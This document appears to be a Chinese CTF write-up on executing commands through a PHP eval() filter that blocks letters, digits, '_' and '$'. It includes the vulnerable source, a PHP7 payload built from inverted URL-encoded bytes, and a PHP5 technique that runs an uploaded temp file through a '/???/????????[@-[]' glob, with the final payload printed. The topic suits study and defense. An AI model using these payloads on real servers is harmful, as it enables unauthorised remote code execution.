RCE-无字母数字webshell命令执行
目录
1.源码
2.题目解析
3.利用方法
3.1 PHP7下如何实现
3.2PHP5下如何实现
3.2.1 shell下可以利用. 来执行任意脚本
3.2.2 Linux文件名支持用glob通配符代替
1.题目源码
<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}2.题目解析
根据上述代码可以得出:
webshell长度不超过35位
除了不包含字母数字,还不能包含
$和_
因为$不能使用了,所以我们无法构造PHP中的变量。所以,如何解决这个问题?
3.利用方法
3.1 PHP7下如何实现
PHP7前是不允许用`($a)();`这样的方法来执行动态函数的,但PHP7中增加了对此的支持。可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。
不能使用字母,所以我们使用url编码来表示:
(%8F%97%8F%96%91%99%90)();
因为在linux中~是表示反码,既就是取反。刚好加在前面就可以。所以我们得到:
(~%8F%97%8F%96%91%99%90)();
测试之后结果如下:
测试结束,方法可用
3.2PHP5下如何实现
因为php5并不支持刚才这种表达方式,所以我们必须得另辟蹊径
3.2.1 shell下可以利用. 来执行任意脚本
考虑用“反引号”+“shell”的方式来getshell,因为反引号不属于“字母”、“数字”,所以我们可以执行统命令,但问题来了:如何利用无字母、数字、$的系统命令来getshell?
它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如:当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。而且用. file执行文件,是不需要file有x权限的。
如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?
这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。
3.2.2 Linux文件名支持用glob通配符代替
执行. /tmp/phpXXXXXX,也是有字母的。此时就可以用到Linux下的glob通配符:
1)*可以代替0个及以上任意字符
2)?可以代表1个任意字符
那么,/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。
但如果执行. /???/?????????,页面会显示错误
这是由于执行. /???/?????????通配符后的文件有很多
可以看出存在这么多的文件,执行第一个匹配上的文件(即/bin/addr2l ine)的时候就已经出现了错误,导致整个流程停止,根本不会执行到我们上传的文件。
就跟正则表达式类似,glob支持利用[0-9]来表示一个范围。
我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写,只有PHP生成的临时文件包含大写字母。我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。
翻开ascii码表,可见大写字母位于@与[之间:
所以我们可以利用[@-[]来表示大写字母,构造如下payload:
. /???/????????[@-[]
前端页面源码
<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head><body><form action="web.php" method="post" enctype="multipart/form-data"><input type="file" name="upload_file" id=""><input type="submit" value="submit"></form>
</body>web.php源码
<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}编写一个txt文件上传至前端页面
接下来使burp suite进行测试
在第一行传入payload:
?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b
结果如下:
然后将我们修改好的包发送,得到如下结果:
测试成功!
以上就是在php7和php5下的无字母数字的webshell 命令执行。